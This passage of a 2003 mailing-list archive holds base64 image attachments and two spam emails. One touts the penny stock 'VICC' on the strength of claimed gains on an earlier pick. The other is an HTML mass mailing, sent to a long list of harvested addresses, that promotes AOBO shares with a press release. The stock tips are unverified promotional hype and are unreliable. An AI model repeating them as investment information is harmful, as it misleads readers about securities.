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
HroN6ambYlCfLZqchpIIkumaCfqiEhABADs=

------=_NextPart_000_01AC_01C2D37F.9153A2C0
Content-Type: application/octet-stream;
	name="=?utf-8?Q?Hintergrund_f=C3=BCr_Natur.jpg?="
Content-Transfer-Encoding: base64
Content-ID: <01ab01c2d377$2f8c2d80$15eefea9@ultraknall>

/9j/4AAQSkZJRgABAgEAYABgAAD/7QY8UGhvdG9zaG9wIDMuMAA4QklNA+0AAAAAABAAYAAAAAEA
AQBgAAAAAQABOEJJTQPzAAAAAAAIAAAAAAAAAAA4QklNBAoAAAAAAAEAADhCSU0nEAAAAAAACgAB
AAAAAAAAAAI4QklNA/UAAAAAAEgAL2ZmAAEAbGZmAAYAAAAAAAEAL2ZmAAEAoZmaAAYAAAAAAAEA
MgAAAAEAWgAAAAYAAAAAAAEANQAAAAEALQAAAAYAAAAAAAE4QklNA/gAAAAAAHAAAP//////////
//////////////////8D6AAAAAD/////////////////////////////A+gAAAAA////////////
/////////////////wPoAAAAAP////////////////////////////8D6AAAOEJJTQQIAAAAAAAQ
AAAAAQAAAkAAAAJAAAAAADhCSU0ECQAAAAAEywAAAAEAAACAAAAAYAAAAYAAAJAAAAAErwAYAAH/
2P/gABBKRklGAAECAQBIAEgAAP/+ACdGaWxlIHdyaXR0ZW4gYnkgQWRvYmUgUGhvdG9zaG9wqCA0
LjAA/+4ADkFkb2JlAGSAAAAAAf/bAIQADAgICAkIDAkJDBELCgsRFQ8MDA8VGBMTFRMTGBEMDAwM
DAwRDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAENCwsNDg0QDg4QFA4ODhQUDg4ODhQRDAwM
DAwREQwMDAwMDBEMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8AAEQgAYACAAwEiAAIRAQMR
Af/dAAQACP/EAT8AAAEFAQEBAQEBAAAAAAAAAAMAAQIEBQYHCAkKCwEAAQUBAQEBAQEAAAAAAAAA
AQACAwQFBgcICQoLEAABBAEDAgQCBQcGCAUDDDMBAAIRAwQhEjEFQVFhEyJxgTIGFJGhsUIjJBVS
wWIzNHKC0UMHJZJT8OHxY3M1FqKygyZEk1RkRcKjdDYX0lXiZfKzhMPTdePzRieUpIW0lcTU5PSl
tcXV5fVWZnaGlqa2xtbm9jdHV2d3h5ent8fX5/cRAAICAQIEBAMEBQYHBwYFNQEAAhEDITESBEFR
YXEiEwUygZEUobFCI8FS0fAzJGLhcoKSQ1MVY3M08SUGFqKygwcmNcLSRJNUoxdkRVU2dGXi8rOE
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
9fs3akJ9/wAAvZFjGBOk79H/2Q==

------=_NextPart_000_01AC_01C2D37F.9153A2C0--

From incomingforward@cs.com Wed Feb 19 01:15:05 2003
Return-Path: <incomingforward@cs.com>
Received: from smtp.wp.pl (smtp.wp.pl [212.77.101.161])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with ESMTP id h1J6F3aN023630
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 19 Feb 2003 01:15:04 -0500 (EST)
Message-Id: <200302190615.h1J6F3aN023630@netlib2.cs.utk.edu>
Received: (WP-SMTPD 1080 invoked from network); 19 Feb 2003 06:14:57 -0000
Received: from unknown (HELO smtp0000.mail.yahoo.com) (abc@[62.110.31.24])
          (envelope-sender <incomingforward@cs.com>)
          by smtp.wp.pl (wp-smtpd) with SMTP
          for <blarson@northstarmls.com>; 19 Feb 2003 06:14:56 -0000
Date: Wed, 19 Feb 2003 06:14:58 GMT
From: incomingforward@cs.com
X-Priority: 3
To: blarson@northstarmls.com
Subject: blarson, LIVE FROM WALL STREET: VICC Test Results Are In..........
Mime-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-AntiVirus: skaner antywirusowy poczty Wirtualnej Polski S. A.
X-WP-ChangeAV: 0

blarson@northstarmls.com
<p>If you bought into our last recommendation (CIMG) early enough you had an excellent opportunity to make substantial gains (from .90 to 1.65 in just the first day).  Now is your chance to do the same with our newest pick: VICC.  To find out more go to <a href="http://12.148.59.67">Live From the Street</a>.</p>
<p align="center"><img border="0" src="http://12.148.59.67/bm01.gif"></p>
<p>If you no longer want to receive information from us just go to 
<a href="mailto:tallrhe@cs.com">tallrhe@cs.com</a>.<p>
&nbsp;

From AOBO@edirectoffers.com Mon Feb 24 14:18:12 2003
Return-Path: <AOBO@edirectoffers.com>
Received: from sccrmhc03.attbi.com (sccrmhc03.attbi.com [204.127.202.63])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with ESMTP id h1OJIBaN027079;
	Mon, 24 Feb 2003 14:18:12 -0500 (EST)
Message-Id: <200302241918.h1OJIBaN027079@netlib2.cs.utk.edu>
Received: from sccrmhc03.attbi.com (localhost[127.0.0.1])
          by sccrmhc03.attbi.com (sccrmhc03) with ESMTP
          id <2003022419164000300jnh4ve>; Mon, 24 Feb 2003 19:16:53 +0000
X-Comment: AT&T Maillennium special handling code - x
Received: from sccrmhc02.attbi.com (sccrmhc02-qfe1.ops.asp.att.net[192.168.202.82])
          by sccrmhc03.attbi.com (sccrmhc03) with ESMTP
          id <20030224163908002004pv36e>; Mon, 24 Feb 2003 16:39:21 +0000
X-Comment: AT&T Maillennium special handling code - x
Received: from newg (c-54-28-176-66.se.biz.attbi.com[66.176.28.54])
          by sccrmhc02.attbi.com (sccrmhc02) with SMTP
          id <20030224163908002004pv36e>; Mon, 24 Feb 2003 16:39:19 +0000
X-Comment: AT&T Maillennium special handling code - x
From: "" <AOBO@edirectoffers.com>
To: "" <bizops7@yahoo.com>, "" <bizpromo@directbizpromo.com>,
   "" <bizsitebiz-on@mail-list.com>, "" <bizsuccess-on@bizsuccess.com>,
   "" <bizsuccess@myreply.com>, "" <bizzibee@bigpond.com>, "" <bj134@bfn.org>,
   "" <bj4now@hotmail.com>, "" <bjacks8210@aol.com>,
   "" <bjacobs@ucssun1.sdsu.edu>, "" <bjajnjpj@aol.com>, "" <bjb228@aol.com>,
   "" <bjb@tappedin.org>, "" <bjberti@hotmail.com>,
   "" <bjmcclure@acf.dhhs.gov>, "" <bjodmjhnhcdihaaa@angelfire.com>,
   "" <bjoern.schneider@rhein-neckar.netsurf.de>, "" <bjohn318@aol.com>,
   "" <bjokr@itn.liu.se>, "" <bjones@ucsd.edu>, "" <bjones@weber.ucsd.edu>,
   "" <bjorgk@postur.is>, "" <bjorn@debian.org>, "" <bjr@cellar.org>,
   "" <bjueneman@listserv.temple.edu>, "" <bjueneman@novell.com>,
   "" <bjunited@bjunited.com.cn>, "" <bjzolp@students.wisc.edu>,
   "" <bk361kb@aol.com>, "" <bk@bookmarkpublishing.com>,
   "" <bkblock@netaxis.com>, "" <bkchell@juno.com>, "" <bkchest@pipeline.com>,
   "" <bkelley1@nycap.rr.com>, "" <bkemp@esn.net>, "" <bkerea66@yahoo.com>,
   "" <bkexpress@aw.com>, "" <bkgallry@crl.com>,
   "" <bkinsley@thevirtualpool.com>, "" <bkkabea@juno.com>,
   "" <bklabel@aol.com>, "" <bkmanfict@yahoo.com>, "" <bkmine@ns.net>,
   "" <bkorb@pacbell.net>, "" <bkorders@taylorandfrancis.com>,
   "" <bkpub@bkpub.com>, "" <bkriter@footnet.com>,
   "" <bks@research.bell-labs.com>, "" <bksource@msn.com>,
   "" <bkunert@ramfans.com>, "" <bkunert@usgs.gov>, "" <bkworld@aol.com>,
   "" <bla@engny.mhs.compuserve.com>, "" <blaash@aol.com>, "" <black@via.at>,
   "" <blackat@direct.ca>, "" <blackbeatproduct@aol.com>,
   "" <blackbirdnz@hotmail.com>, "" <blackbob@wwa.com>, "" <blackbox@bbox.com>,
   "" <blackdmn20@aol.com>, "" <blackfocus@mindspring.com>,
   "" <blackhawk117@home.com>, "" <blackhole@trax.fsworld.co.uk>,
   "" <blackhorse@blackhorse.pl>, "" <blackie@imada.ou.dk>,
   "" <blackje@crd.ge.com>, "" <blacklist@womenrussia.com>,
   "" <blacknus@igs.net>, "" <blackoak2@infoconex.com>,
   "" <blackoakbks@earthlink.net>, "" <blackpoplar9@aol.com>,
   "" <blackqueen2000@reggaemail.com>, "" <blackstn@aol.com>,
   "" <blackwells.extra@blackwell.co.uk>, "" <blair@blairrobertson.com>,
   "" <blairpub@blairpub.com>, "" <blake@blakesbooks.com>,
   "" <blake@calinet.com>, "" <blake@digital-evidence.com>,
   "" <blakeman@europa.com>, "" <blakrose@web.net>,
   "" <blancacuevas55@hotmail.com>, "" <bland@apple.com>,
   "" <blandis@epix.net>, "" <blapointe@dsisd.k12.mi.us>,
   "" <blast-funct-archive@netlib2.cs.utk.edu>, "" <blast-funct@cs.utk.edu>,
   "" <blast-lb-archive@netlib2.cs.utk.edu>,
   "" <blast-lite-archive@netlib2.cs.utk.edu>,
   "" <blast-parallel-archive@netlib2.cs.utk.edu>,
   "" <blast-sparse-archive@netlib2.cs.utk.edu>, "" <blasting@compsurf.com>,
   "" <blawbull@cs.com>, "" <blawso4@us.ibm.com>, "" <blaze@nether.net>,
   "" <blc@bsdwins.com>, "" <blcr@web.net>, "" <bldjj@yahoo.com>,
   "" <bleab@msn.com>
Cc: 
Date: Mon, 24 Feb 03 11:37:03 -0500
Subject: Press From AOBO
X-Mailer: ExclamationSoft Corporation Mail Version 2.0
X-MSMail-Priority: NORMAL
MIME-Version: 1.0
Content-Type: text/html;
	boundary="----=_ExClAmAtIoNsOfT_MaIl_PaRt_BoUnDaRy"

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
<META NAME="Generator" CONTENT="NetObjects Fusion 5.0 for Windows">
<TITLE>AOBO</TITLE>
<script>
function invitepopup(url) {window.open(url,'artist','width='+540+',height='+500+',scrollbars=yes,status=no');
}
</script>
<LINK REL=STYLESHEET TYPE="text/css" HREF="http://www.edirectoffers.com/aobo/./style.css">
<LINK REL=STYLESHEET TYPE="text/css" HREF="http://www.edirectoffers.com/aobo/./site.css">
<STYLE>
</STYLE>
</HEAD>
<BODY STYLE="text-align: center; background-color: rgb(102,102,153);" TOPMARGIN=0 LEFTMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0>
    <TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 NOF=LY>
        <TR VALIGN=TOP ALIGN=LEFT>
            <TD WIDTH=627>
                <TABLE ID="Table1" BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH=627>
                    <COLGROUP>
                    <COL WIDTH=16>
                    <COL WIDTH=230>
                    <COL WIDTH=128>
                    <COL WIDTH=132>
                    <COL WIDTH=121>
                    </COLGROUP>
                    <TR>
                        <TD COLSPAN=5 STYLE="background-color: rgb(255,255,255); border: 1pt solid rgb(0,0,0); padding: 4px;">
                            <P STYLE="text-align: right;"><B><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: xx-small;">&nbsp;<A HREF="http://www.edirectoffers.com/aobo/./Bio/bio.html">Home Page</A> - </SPAN></B><A HREF="http://www.edirectoffers.com/aobo/./Bio/bio.html"><B><SPAN
                                 STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: xx-small;">Company Info</SPAN></B></A><B><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; 
                                font-size: xx-small;">&nbsp; </SPAN></B></P>
                        </TD>
                    </TR>
                    <TR>
                        <TD COLSPAN=5 STYLE="border: 1pt solid rgb(0,0,0);">
                            <P><IMG ID="Picture3" HEIGHT=353 WIDTH=625 SRC="http://www.edirectoffers.com/aobo/./aobofront23456.jpg" VSPACE=0 HSPACE=0 ALIGN="TOP" BORDER=0 USEMAP="#map0"><MAP NAME="map0"><AREA SHAPE=RECT ALT="" COORDS="125,5,183,19" HREF="http://www.edirectoffers.com/aobo/./Bio/bio.html"><AREA
                                 SHAPE=RECT ALT="" COORDS="182,3,296,20" HREF="http://finance.yahoo.com/q?s=AOBO.OB&d=t"><AREA SHAPE=RECT ALT="" COORDS="295,1,406,20" HREF="http://biz.yahoo.com/n/a/aobo.ob.html"><AREA SHAPE=RECT ALT=""
                                 COORDS="406,6,519,19" HREF="http://finance.yahoo.com/q?s=AOBO.OB&d=v3"><AREA SHAPE=RECT ALT="" COORDS="310,67,584,292" HREF="http://biz.yahoo.com/n/a/aobo.ob.html"><AREA SHAPE=RECT ALT="" COORDS="16,28,307,341"
                                 HREF="http://finance.yahoo.com/q?s=AOBO.OB&d=t"></MAP></P>
                        </TD>
                    </TR>
                    <TR>
                        <TD WIDTH=16 STYLE="background-color: rgb(255,255,255); border-left: 1pt solid rgb(102,102,153); border-bottom: 1pt solid rgb(102,102,153);">
                            <P><SPAN STYLE="color: rgb(255,255,255);">.</SPAN></P>
                        </TD>
                        <TD COLSPAN=4 STYLE="background-color: rgb(255,255,255); border: 1pt solid rgb(102,102,153); padding: 7px;">
                            <P><B><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;"><A HREF="http://finance.yahoo.com/q?s=AOBO.OB&d=t">AOBO Completes Purchase of Soybean Protein Peptide Project</A>
                                <BR></SPAN></B><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: xx-small; color: rgb(255,0,0);">January 28, 2003 12:06:00 PM ET</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;"><B>HONG KONG, Jan. 28 /PRNewswire-FirstCall/ -- American Oriental Bioengineering Inc. (OTC Bulletin Board: <A
                                 HREF="http://finance.yahoo.com/q?s=AOBO.OB&d=t">AOBO</A>)</B>
                                 announced that its board of directors has approved the completion of the Soybean Protein Peptide project purchase, worth an estimated $40 million, effective immediately.</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">On October 11, 2002, AOBO filed an Information Statement Pursuant to Section 14(c) of the Securities Exchange Act of 
                                1934, announcing that a total of 20,284,810 shares of Common Stock and 1,000,000 shares of Class A Preferred Stock will be issued by AOBO in consideration for 100% ownership interest in a soybean protein peptide 
                                biochemical engineering project (the &quot;Project&quot;) as described in the Purchase Agreement dated as of August 17, 2002 signed by Shujun Liu and AOBO. The value of the Common Stock to be issued is approximately 
                                $3,205,000, which is equivalent to $0.158 per share of common stock, which is the average of the closing price for the five-day period immediately following the date of the Purchase Agreement, August 19, 2002 to 
                                August 23, 2002. By acquiring the Project, among other assets, AOBO will acquire ownership of the building housing the Project's manufacturing plant, manufacturing equipment, and environmental control equipment of 
                                which the historical cost is approximately $3,205,000.</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">In addition, AOBO will receive the right to produce the products that resulted from the Project as well as ownership 
                                rights on a pending patent in China for the process of the extraction and production of soybean peptide. The Project, including the production, marketing and sales of various functional soybean peptide medical 
                                tablets and powders, has a fair market value of $40,406,000.</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">About American Oriental Bioengineering, Inc.</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">American Oriental Bioengineering, Inc. is a leading Chinese nutracuetical company that uses proprietary processes for 
                                producing soybean protein peptide more efficiently than traditional extracting techniques. These techniques are used to manufacture and formulate supplemental and medicinal products. The Company focuses on new 
                                product research to combine biotechnology and Chinese medical technology to capture the increasing demand for traditional Chinese medicines and health supplements, both domestically and internationally. Soybean 
                                peptides are used widely in general food and health food products, sports foods, medicines, fermentation industry and in environmental protection applications</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">Safe Harbor Statement</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">Except for the historical statements made herein, the statements made in this release are forward-looking statements, 
                                including. Risk factors that could cause actual results to differ materially from those projected in forward-looking statements include, but are not limited to, general business conditions, managing growth, and 
                                political and other business risks. Although the Company believes that the forward-looking statements contained herein are reasonable, it can give no assurance that the Company's expectations are correct. All 
                                forward-looking statements are expressly qualified in their entirety by this Cautionary Statement and the risks and other factors detailed in the Company's reports filed with the Securities and Exchange Commission.</SPAN>
                            </P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">China Contact: Lily Li<BR>86-451-6666601<BR>F: 86-451-6690967<BR></SPAN><A HREF="http://www.edirectoffers.com/aobo/mailto:aobo@biosly.com"><SPAN STYLE=
